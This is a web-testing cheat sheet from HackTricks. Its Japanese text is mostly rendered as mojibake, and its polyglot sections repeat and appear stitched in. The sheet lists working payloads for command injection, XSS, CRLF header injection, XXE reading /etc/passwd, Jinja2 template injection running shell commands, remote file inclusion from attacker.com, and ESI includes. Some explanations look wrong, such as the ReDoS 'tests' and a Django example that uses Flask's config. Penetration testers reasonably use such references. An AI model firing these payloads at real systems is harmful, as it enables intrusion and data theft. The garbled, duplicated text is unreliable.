61 KiB
âïž HackTricks Cloud âïž -ðŠ Twitter ðŠ - ðïž Twitch ðïž - ð¥ Youtube ð¥
-
ãµã€ããŒã»ãã¥ãªãã£äŒæ¥ã§åããŠããŸããïŒ HackTricksã§äŒç€Ÿã宣äŒãããã§ããïŒãŸãã¯ãææ°ããŒãžã§ã³ã®PEASSãå ¥æããããHackTricksãPDFã§ããŠã³ããŒããããã§ããïŒSUBSCRIPTION PLANSããã§ãã¯ããŠãã ããïŒ
-
The PEASS FamilyãèŠã€ããŠãã ãããç¬å çãªNFTã®ã³ã¬ã¯ã·ã§ã³ã§ãã
-
å ¬åŒã®PEASSïŒHackTricksã®ã°ããºãæã«å ¥ããŸãããã
-
ð¬ Discordã°ã«ãŒããŸãã¯telegramã°ã«ãŒãã«åå ããããTwitterã§ãã©ããŒããŠãã ããðŠ@carlospolopmã
-
**ãããã³ã°ã®ããªãã¯ãå ±æããã«ã¯ãhacktricksãªããžããªãšhacktricks-cloudãªããžããª**ã«PRãæåºããŠãã ããã
ãããã®PoCãšPolyglothsã®ç®çã¯ããã¹ã¿ãŒãå ¥åãå¿çã«åæ ãããŠããå Žåã«å©çšã§ããè匱æ§ã®èŠçŽãè¿ éã«æäŸããããšã§ãã
{% hint style="warning" %} ãã®ããŒãã·ãŒãã¯ãåè匱æ§ã®ãã¹ãã®å æ¬çãªãªã¹ããææ¡ããŠããŸãããåºæ¬çãªãã¹ãã®ã¿ãæäŸããŠããŸããããå æ¬çãªãã¹ããæ¢ããŠããå Žåã¯ãææ¡ãããåè匱æ§ã«ã¢ã¯ã»ã¹ããŠãã ããã {% endhint %}
{% hint style="danger" %} Content-Typeã«äŸåããXXEã®ãããªã€ã³ãžã§ã¯ã·ã§ã³ã¯èŠã€ãããŸãããéåžžãXMLããŒã¿ãéä¿¡ãããªã¯ãšã¹ããèŠã€ãã£ãå Žåã¯ãèªåã§è©Šãããšã«ãªãã§ãããããŸããããã§ã¯ããŒã¿ããŒã¹ã€ã³ãžã§ã¯ã·ã§ã³ãèŠã€ãããŸããããªããªããããã€ãã®ã³ã³ãã³ããåæ ããããããããŸããããããã¯ããã¯ãšã³ãã®DBãã¯ãããžãŒãšæ§é ã«å€§ããäŸåããããã§ãã {% endhint %}
Polyglothsãªã¹ã
{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button â onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
ã¯ã©ã€ã¢ã³ããµã€ããã³ãã¬ãŒãã€ã³ãžã§ã¯ã·ã§ã³
åºæ¬çãªãã¹ã
{{7*7}}
[7*7]
ããªã°ããã
A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.
ããªã°ãããã¯ãéãããæèã«ãã£ãŠç°ãªããã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšãã§ãããã¡ã€ã«ã§ãããŠã§ããããã³ã°ã®æèã§ã¯ãããªã°ãããã¯ã»ãã¥ãªãã£å¯Ÿçãåé¿ããæªæã®ããã³ãŒããå®è¡ããããã«äœ¿çšãããããšããããŸãã
Polyglot File Types
ããªã°ããããã¡ã€ã«ã®çš®é¡
-
HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript, allowing for the execution of JavaScript code within an HTML context.
-
HTML/JavaScript ããªã°ããã: ãããã®ãã¡ã€ã«ã¯ãHTMLãšJavaScriptã®äž¡æ¹ãšããŠè§£éãããããšãã§ããHTMLã®ã³ã³ããã¹ãå ã§JavaScriptã³ãŒããå®è¡ããããšãã§ããŸãã
-
XML/JavaScript Polyglots: These files can be interpreted as both XML and JavaScript, allowing for the execution of JavaScript code within an XML context.
-
XML/JavaScript ããªã°ããã: ãããã®ãã¡ã€ã«ã¯ãXMLãšJavaScriptã®äž¡æ¹ãšããŠè§£éãããããšãã§ããXMLã®ã³ã³ããã¹ãå ã§JavaScriptã³ãŒããå®è¡ããããšãã§ããŸãã
-
SVG/JavaScript Polyglots: These files can be interpreted as both SVG and JavaScript, allowing for the execution of JavaScript code within an SVG context.
-
SVG/JavaScript ããªã°ããã: ãããã®ãã¡ã€ã«ã¯ãSVGãšJavaScriptã®äž¡æ¹ãšããŠè§£éãããããšãã§ããSVGã®ã³ã³ããã¹ãå ã§JavaScriptã³ãŒããå®è¡ããããšãã§ããŸãã
-
Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript, allowing for the execution of JavaScript code within an image context.
-
ç»å/JavaScript ããªã°ããã: ãããã®ãã¡ã€ã«ã¯ãç»åãã¡ã€ã«ãšJavaScriptã®äž¡æ¹ãšããŠè§£éãããããšãã§ããç»åã®ã³ã³ããã¹ãå ã§JavaScriptã³ãŒããå®è¡ããããšãã§ããŸãã
-
PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript, allowing for the execution of JavaScript code within a PDF context.
-
PDF/JavaScript ããªã°ããã: ãããã®ãã¡ã€ã«ã¯ãPDFãšJavaScriptã®äž¡æ¹ãšããŠè§£éãããããšãã§ããPDFã®ã³ã³ããã¹ãå ã§JavaScriptã³ãŒããå®è¡ããããšãã§ããŸãã
-
ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript, allowing for the execution of JavaScript code within a ZIP context.
-
ZIP/JavaScript ããªã°ããã: ãããã®ãã¡ã€ã«ã¯ãZIPã¢ãŒã«ã€ããšJavaScriptã®äž¡æ¹ãšããŠè§£éãããããšãã§ããZIPã®ã³ã³ããã¹ãå ã§JavaScriptã³ãŒããå®è¡ããããšãã§ããŸãã
Polyglot Techniques
ããªã°ãããã®ãã¯ããã¯
-
Comment Polyglots: These polyglots exploit the fact that different file types have different comment syntaxes. By strategically placing comments, a file can be interpreted differently depending on the context.
-
ã³ã¡ã³ãããªã°ããã: ãããã®ããªã°ãããã¯ãç°ãªããã¡ã€ã«ã¿ã€ãã«ã¯ç°ãªãã³ã¡ã³ãã®æ§æããããšããäºå®ãå©çšããŠããŸããã³ã¡ã³ããæŠç¥çã«é 眮ããããšã§ããã¡ã€ã«ã¯ã³ã³ããã¹ãã«å¿ããŠç°ãªã解éãã§ããŸãã
-
Extension Polyglots: These polyglots exploit the fact that different file types have different file extensions. By using a specific file extension, a file can be interpreted as a different file type.
-
æ¡åŒµåããªã°ããã: ãããã®ããªã°ãããã¯ãç°ãªããã¡ã€ã«ã¿ã€ãã«ã¯ç°ãªããã¡ã€ã«æ¡åŒµåããããšããäºå®ãå©çšããŠããŸããç¹å®ã®ãã¡ã€ã«æ¡åŒµåã䜿çšããããšã§ããã¡ã€ã«ã¯ç°ãªããã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšãã§ããŸãã
-
Content Polyglots: These polyglots exploit the fact that different file types have different content structures. By carefully crafting the content of a file, it can be interpreted as different file types.
-
ã³ã³ãã³ãããªã°ããã: ãããã®ããªã°ãããã¯ãç°ãªããã¡ã€ã«ã¿ã€ãã«ã¯ç°ãªãã³ã³ãã³ãæ§é ããããšããäºå®ãå©çšããŠããŸãããã¡ã€ã«ã®ã³ã³ãã³ãã泚ææ·±ãäœæããããšã§ããã¡ã€ã«ã¯ç°ãªããã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšãã§ããŸãã
-
MIME Type Polyglots: These polyglots exploit the fact that different file types have different MIME types. By specifying a specific MIME type, a file can be interpreted as a different file type.
-
MIMEã¿ã€ãããªã°ããã: ãããã®ããªã°ãããã¯ãç°ãªããã¡ã€ã«ã¿ã€ãã«ã¯ç°ãªãMIMEã¿ã€ãããããšããäºå®ãå©çšããŠããŸããç¹å®ã®MIMEã¿ã€ããæå®ããããšã§ããã¡ã€ã«ã¯ç°ãªããã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšãã§ããŸãã
-
Encoding Polyglots: These polyglots exploit the fact that different file types have different character encodings. By using a specific character encoding, a file can be interpreted as a different file type.
-
ãšã³ã³ãŒãã£ã³ã°ããªã°ããã: ãããã®ããªã°ãããã¯ãç°ãªããã¡ã€ã«ã¿ã€ãã«ã¯ç°ãªãæåãšã³ã³ãŒãã£ã³ã°ããããšããäºå®ãå©çšããŠããŸããç¹å®ã®æåãšã³ã³ãŒãã£ã³ã°ã䜿çšããããšã§ããã¡ã€ã«ã¯ç°ãªããã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšãã§ããŸãã
{{7*7}}[7*7]
ã³ãã³ãã€ã³ãžã§ã¯ã·ã§ã³
åºæ¬çãªãã¹ã
;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)
ããªã°ããã
A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.
ããªã°ãããã¯ãéãããæèã«ãã£ãŠç°ãªããã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšãã§ãããã¡ã€ã«ã§ãããŠã§ããããã³ã°ã®æèã§ã¯ãããªã°ãããã¯ã»ãã¥ãªãã£å¯Ÿçãåé¿ããæªæã®ããã³ãŒããå®è¡ããããã«äœ¿çšãããããšããããŸãã
Polyglot File Types
ããªã°ããããã¡ã€ã«ã®çš®é¡
-
HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript, allowing attackers to execute malicious code in the browser.
-
HTML/JavaScript ããªã°ããã: ãããã®ãã¡ã€ã«ã¯HTMLãšJavaScriptã®äž¡æ¹ãšããŠè§£éããããããæ»æè ã¯ãã©ãŠã¶ã§æªæã®ããã³ãŒããå®è¡ããããšãã§ããŸãã
-
PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript, allowing attackers to exploit vulnerabilities in PDF readers.
-
PDF/JavaScript ããªã°ããã: ãããã®ãã¡ã€ã«ã¯PDFãšJavaScriptã®äž¡æ¹ãšããŠè§£éããããããæ»æè ã¯PDFãªãŒããŒã®è匱æ§ãæªçšããããšãã§ããŸãã
-
Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript, allowing attackers to hide malicious code within seemingly harmless images.
-
ç»å/JavaScript ããªã°ããã: ãããã®ãã¡ã€ã«ã¯ç»åãã¡ã€ã«ãšJavaScriptã®äž¡æ¹ãšããŠè§£éããããããæ»æè ã¯èŠããäžç¡å®³ãªç»åå ã«æªæã®ããã³ãŒããé ãããšãã§ããŸãã
Polyglot Techniques
ããªã°ãããã®ãã¯ããã¯
-
Comment Injection: By injecting specific comments into a file, it can be interpreted as multiple file types. For example, injecting HTML comments into a JavaScript file can make it a valid HTML file as well.
-
ã³ã¡ã³ãã€ã³ãžã§ã¯ã·ã§ã³: ç¹å®ã®ã³ã¡ã³ãããã¡ã€ã«ã«æ³šå ¥ããããšã§ãè€æ°ã®ãã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšããããŸããäŸãã°ãJavaScriptãã¡ã€ã«ã«HTMLã³ã¡ã³ããæ³šå ¥ããããšã§ããããæå¹ãªHTMLãã¡ã€ã«ã«ããããšãã§ããŸãã
-
File Extension Manipulation: By manipulating the file extension, a file can be interpreted as a different file type. For example, changing the extension of a JavaScript file to ".jpg" can make it appear as an image file.
-
ãã¡ã€ã«æ¡åŒµåã®æäœ: ãã¡ã€ã«ã®æ¡åŒµåãæäœããããšã§ããã¡ã€ã«ãç°ãªããã¡ã€ã«ã¿ã€ããšããŠè§£éããããšãã§ããŸããäŸãã°ãJavaScriptãã¡ã€ã«ã®æ¡åŒµåã".jpg"ã«å€æŽããããšã§ããããç»åãã¡ã€ã«ãšããŠè¡šç€ºããããšãã§ããŸãã
-
Content Sniffing: By manipulating the content of a file, it can be interpreted as a different file type. For example, adding specific bytes at the beginning of a file can make it appear as a different file type to content sniffing algorithms.
-
ã³ã³ãã³ãã¹ãããã£ã³ã°: ãã¡ã€ã«ã®å 容ãæäœããããšã§ããã¡ã€ã«ãç°ãªããã¡ã€ã«ã¿ã€ããšããŠè§£éããããšãã§ããŸããäŸãã°ããã¡ã€ã«ã®å é ã«ç¹å®ã®ãã€ããè¿œå ããããšã§ãã³ã³ãã³ãã¹ãããã£ã³ã°ã¢ã«ãŽãªãºã ã«ãã£ãŠç°ãªããã¡ã€ã«ã¿ã€ããšããŠè¡šç€ºãããããšããããŸãã
Polyglot Tools
ããªã°ãããããŒã«
-
Polyglot Image Generator: A tool that generates polyglot images that can be interpreted as both image files and JavaScript.
-
ããªã°ãããã€ã¡ãŒãžãžã§ãã¬ãŒã¿: ç»åãã¡ã€ã«ãšJavaScriptã®äž¡æ¹ãšããŠè§£éãããããªã°ãããã€ã¡ãŒãžãçæããããŒã«ã
-
Polyglot PDF Generator: A tool that generates polyglot PDF files that can be interpreted as both PDF and JavaScript.
-
ããªã°ãããPDFãžã§ãã¬ãŒã¿: PDFãšJavaScriptã®äž¡æ¹ãšããŠè§£éãããããªã°ãããPDFãã¡ã€ã«ãçæããããŒã«ã
-
Polyglot HTML/JavaScript Generator: A tool that generates polyglot files that can be interpreted as both HTML and JavaScript.
-
ããªã°ãããHTML/JavaScriptãžã§ãã¬ãŒã¿: HTMLãšJavaScriptã®äž¡æ¹ãšããŠè§£éãããããªã°ããããã¡ã€ã«ãçæããããŒã«ã
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
CRLF
åºæ¬çãªãã¹ã
CRLF Injection
CRLFã€ã³ãžã§ã¯ã·ã§ã³ã¯ãæ¹è¡æåïŒCRLFïŒãæªçšããŠæ»æè ãWebã¢ããªã±ãŒã·ã§ã³ã«äžæ£ãªæ¹è¡ãæ¿å ¥ããããšãã§ããè匱æ§ã§ããããã«ãããæ»æè ã¯HTTPããããŒã®æ¹ãããã¯ãããŒã®çã¿åãããªãã€ã¬ã¯ãã®æªçšãªã©ãããŸããŸãªæ»æãå®è¡ããããšãã§ããŸãã
以äžã¯ãCRLFã€ã³ãžã§ã¯ã·ã§ã³ããã¹ãããããã®åºæ¬çãªææ³ã§ãã
1. æ¹è¡æåã®æ¿å ¥
æ»æè ã¯ãæ¹è¡æåïŒ%0d%0aãŸãã¯%0aïŒãå ¥åãã£ãŒã«ãã«æ¿å ¥ããŠãæ¹è¡ãçºçãããããšãã§ããŸããããã«ãããæ»æè ã¯HTTPããããŒãæ¹ãããããªã©ã®æ»æãè¡ãããšãã§ããŸãã
2. ãªãã€ã¬ã¯ãã®æªçš
æ»æè ã¯ãæ¹è¡æåã䜿çšããŠãªãã€ã¬ã¯ããæªçšããããšãã§ããŸããäŸãã°ã以äžã®ãããªURLãäœæããããšãã§ããŸãã
http://example.com/%0d%0aLocation:%20http://attacker.com
ãã®URLãã¯ãªãã¯ãããšããŠãŒã¶ãŒã¯æ»æè ã®ãµã€ãã«ãªãã€ã¬ã¯ããããŸãã
3. ã¯ãããŒã®çã¿åã
æ»æè ã¯ãæ¹è¡æåã䜿çšããŠã¯ãããŒãçã¿åãããšãã§ããŸããäŸãã°ã以äžã®ãããªURLãäœæããããšãã§ããŸãã
http://example.com/%0d%0aSet-Cookie:%20sessionid=attacker
ãã®URLãã¯ãªãã¯ãããšãæ»æè ã¯ãŠãŒã¶ãŒã®ã»ãã·ã§ã³IDãçã¿åãããšãã§ããŸãã
CRLFã€ã³ãžã§ã¯ã·ã§ã³ã®æ€åº
CRLFã€ã³ãžã§ã¯ã·ã§ã³ã®è匱æ§ãæ€åºããããã«ã¯ã以äžã®ææ³ã䜿çšããããšãã§ããŸãã
1. ããŒãžã®ãœãŒã¹ã³ãŒãã®ç¢ºèª
Webã¢ããªã±ãŒã·ã§ã³ã®ãœãŒã¹ã³ãŒãã確èªããå ¥åãã£ãŒã«ãããªãã€ã¬ã¯ãåŠçãªã©ã§æ¹è¡æåãé©åã«åŠçãããŠãããã©ããã確èªããŸãã
2. ãªã¯ãšã¹ãã®ãã£ããã£
æ»æè ãæ¹è¡æåãæ¿å ¥ããå¯èœæ§ããããªã¯ãšã¹ãããã£ããã£ããæ¹è¡æåãæ£ããåŠçãããŠãããã©ããã確èªããŸãã
3. ã¬ã¹ãã³ã¹ã®ç¢ºèª
æ»æè ãæ¹è¡æåãæ¿å ¥ããå¯èœæ§ãããã¬ã¹ãã³ã¹ã確èªããæ¹è¡æåãæ£ããåŠçãããŠãããã©ããã確èªããŸãã
以äžãCRLFã€ã³ãžã§ã¯ã·ã§ã³ã®åºæ¬çãªãã¹ãææ³ã§ãããããã®ææ³ã䜿çšããŠãWebã¢ããªã±ãŒã·ã§ã³ã®CRLFã€ã³ãžã§ã¯ã·ã§ã³ã®è匱æ§ãæ€åºããããšãã§ããŸãã
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
åºæ¬ãã¹ã
HTML Injection
Description
HTML Injection is a vulnerability that allows an attacker to inject malicious HTML code into a vulnerable web application. This can lead to various attacks such as Cross-Site Scripting (XSS), defacement of the website, or even the theft of sensitive information.
Test
To test for HTML Injection, you can try injecting HTML tags into user input fields or parameters in the URL. For example, you can try injecting the following code:
<script>alert('XSS')</script>
If the web application is vulnerable to HTML Injection, the injected code will be executed and the alert message will be displayed.
SQL Injection
Description
SQL Injection is a vulnerability that allows an attacker to manipulate the SQL queries executed by a web application's database. This can lead to unauthorized access, data leakage, or even the complete compromise of the application.
Test
To test for SQL Injection, you can try injecting SQL statements into user input fields or parameters in the URL. For example, you can try injecting the following code:
' OR '1'='1
If the web application is vulnerable to SQL Injection, the injected code will modify the original SQL query and potentially return unintended results.
Command Injection
Description
Command Injection is a vulnerability that allows an attacker to execute arbitrary commands on the underlying operating system. This can lead to unauthorized access, data manipulation, or even the complete compromise of the system.
Test
To test for Command Injection, you can try injecting commands into user input fields or parameters in the URL. For example, you can try injecting the following code:
; ls
If the web application is vulnerable to Command Injection, the injected code will be executed and the output of the ls
command will be displayed.
Path Traversal
Description
Path Traversal is a vulnerability that allows an attacker to access files and directories outside of the web application's intended directory structure. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.
Test
To test for Path Traversal, you can try accessing files or directories outside of the web application's intended directory structure. For example, you can try accessing the following URL:
http://example.com/../../../../etc/passwd
If the web application is vulnerable to Path Traversal, the contents of the /etc/passwd
file will be displayed.
Server-Side Request Forgery (SSRF)
Description
Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to make requests to internal or external resources on behalf of the vulnerable server. This can lead to unauthorized access, data leakage, or even the compromise of other systems.
Test
To test for SSRF, you can try making requests to internal or external resources using the vulnerable server as a proxy. For example, you can try accessing the following URL:
http://example.com/proxy?url=http://internal-resource.com
If the web application is vulnerable to SSRF, the request to internal-resource.com
will be made and the response will be displayed.
Remote File Inclusion (RFI)
Description
Remote File Inclusion (RFI) is a vulnerability that allows an attacker to include remote files in a web application. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.
Test
To test for RFI, you can try including a remote file in the web application. For example, you can try accessing the following URL:
http://example.com/index.php?page=http://attacker.com/malicious-code.php
If the web application is vulnerable to RFI, the remote file http://attacker.com/malicious-code.php
will be included and its contents will be executed.
XML External Entity (XXE) Injection
Description
XML External Entity (XXE) Injection is a vulnerability that allows an attacker to include external entities or files in XML documents processed by a web application. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.
Test
To test for XXE Injection, you can try including an external entity in an XML document processed by the web application. For example, you can try injecting the following code:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
If the web application is vulnerable to XXE Injection, the contents of the /etc/passwd
file will be displayed.
Server-Side Template Injection (SSTI)
Description
Server-Side Template Injection (SSTI) is a vulnerability that allows an attacker to inject malicious code into server-side templates. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.
Test
To test for SSTI, you can try injecting code into server-side templates used by the web application. For example, you can try injecting the following code:
{{7*'7'.__class__.__mro__[1].__subclasses__()[414]('ls',shell=True,stdout=-1).communicate()}}
If the web application is vulnerable to SSTI, the injected code will be executed and the output of the ls
command will be displayed.
Server-Side JavaScript Injection (SSJI)
Description
Server-Side JavaScript Injection (SSJI) is a vulnerability that allows an attacker to inject and execute JavaScript code on the server-side of a web application. This can lead to unauthorized access, data leakage, or even the complete compromise of the application.
Test
To test for SSJI, you can try injecting JavaScript code into server-side components of the web application. For example, you can try injecting the following code:
var fs = require('fs');
fs.readdir('/', function(err, files) {
if (err) throw err;
console.log(files);
});
If the web application is vulnerable to SSJI, the injected code will be executed and the contents of the root directory will be displayed.
Server-Side Template Injection (SSTI) in Flask/Jinja2
Description
Server-Side Template Injection (SSTI) in Flask/Jinja2 is a vulnerability that allows an attacker to inject malicious code into server-side templates used by Flask/Jinja2. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.
Test
To test for SSTI in Flask/Jinja2, you can try injecting code into server-side templates used by the web application. For example, you can try injecting the following code:
{{config.items().__class__.__mro__[2].__subclasses__()[40]()._module.__builtins__['__import__']('os').popen('ls').read()}}
If the web application is vulnerable to SSTI in Flask/Jinja2, the injected code will be executed and the output of the ls
command will be displayed.
Server-Side Template Injection (SSTI) in Django
Description
Server-Side Template Injection (SSTI) in Django is a vulnerability that allows an attacker to inject malicious code into server-side templates used by Django. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.
Test
To test for SSTI in Django, you can try injecting code into server-side templates used by the web application. For example, you can try injecting the following code:
{{config.__class__.__init__.__globals__['__builtins__']['__import__']('os').popen('ls').read()}}
If the web application is vulnerable to SSTI in Django, the injected code will be executed and the output of the ls
command will be displayed.
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
ãã¡ã€ã«ã€ã³ã¯ã«ãŒãžã§ã³/ãã¹ãã©ããŒãµã«
åºæ¬çãªãã¹ã
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
ãªãŒãã³ãªãã€ã¬ã¯ã / ãµãŒããŒãµã€ããªã¯ãšã¹ããã©ãŒãžã§ãª
åºæ¬çãªãã¹ã
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
ReDoS
åºæ¬çãªãã¹ã
Test 1: Single Character Matching
Description
This test checks for the vulnerability of a regular expression to ReDoS when matching a single character.
PoC
/^(a+)+$/.test('a')
Expected Result
The regular expression /^(a+)+$/
should match the string 'a'
without causing excessive backtracking.
Test 2: Multiple Character Matching
Description
This test checks for the vulnerability of a regular expression to ReDoS when matching multiple characters.
PoC
/^(ab+)+$/.test('ab')
Expected Result
The regular expression /^(ab+)+$/
should match the string 'ab'
without causing excessive backtracking.
Test 3: Nested Quantifiers
Description
This test checks for the vulnerability of a regular expression to ReDoS when using nested quantifiers.
PoC
/^(a+b+)+$/.test('ab')
Expected Result
The regular expression /^(a+b+)+$/
should match the string 'ab'
without causing excessive backtracking.
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
ãµãŒããŒãµã€ãã€ã³ã¯ã«ãŒãžã§ã³/ãšããžãµã€ãã€ã³ã¯ã«ãŒãžã§ã³
åºæ¬çãªãã¹ã
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
ããªã°ããã
A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.
ããªã°ãããã¯ãéãããæèã«ãã£ãŠç°ãªããã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšãã§ãããã¡ã€ã«ã§ãããŠã§ããããã³ã°ã®æèã§ã¯ãããªã°ãããã¯ã»ãã¥ãªãã£å¯Ÿçãåé¿ããæªæã®ããã³ãŒããå®è¡ããããã«äœ¿çšãããããšããããŸãã
Polyglot Techniques
Comment Polyglots
Comment polyglots exploit the fact that different file types have different comment syntax. By strategically placing comments in a file, it can be interpreted as multiple file types.
ã³ã¡ã³ãããªã°ããã
ã³ã¡ã³ãããªã°ãããã¯ãç°ãªããã¡ã€ã«ã¿ã€ãã«ã¯ç°ãªãã³ã¡ã³ãã®æ§æããããšããäºå®ãå©çšããŸãããã¡ã€ã«ã«ã³ã¡ã³ããæŠç¥çã«é 眮ããããšã§ãè€æ°ã®ãã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšããããŸãã
Extension Polyglots
Extension polyglots take advantage of the fact that different file types have different file extensions. By using a specific combination of file extensions, a file can be interpreted as multiple file types.
æ¡åŒµåããªã°ããã
æ¡åŒµåããªã°ãããã¯ãç°ãªããã¡ã€ã«ã¿ã€ãã«ã¯ç°ãªããã¡ã€ã«æ¡åŒµåããããšããäºå®ãå©çšããŸããç¹å®ã®çµã¿åããã®ãã¡ã€ã«æ¡åŒµåã䜿çšããããšã§ããã¡ã€ã«ã¯è€æ°ã®ãã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšããããŸãã
MIME Type Polyglots
MIME type polyglots exploit the fact that different file types have different MIME types. By manipulating the MIME type of a file, it can be interpreted as multiple file types.
MIMEã¿ã€ãããªã°ããã
MIMEã¿ã€ãããªã°ãããã¯ãç°ãªããã¡ã€ã«ã¿ã€ãã«ã¯ç°ãªãMIMEã¿ã€ãããããšããäºå®ãå©çšããŸãããã¡ã€ã«ã®MIMEã¿ã€ããæäœããããšã§ããã¡ã€ã«ã¯è€æ°ã®ãã¡ã€ã«ã¿ã€ããšããŠè§£éãããããšããããŸãã
Conclusion
Polyglots are powerful tools in the arsenal of a hacker. By exploiting the different interpretations of file types, polyglots can be used to bypass security measures and execute malicious code. It is important for security professionals to be aware of polyglot techniques in order to effectively defend against them.
çµè«
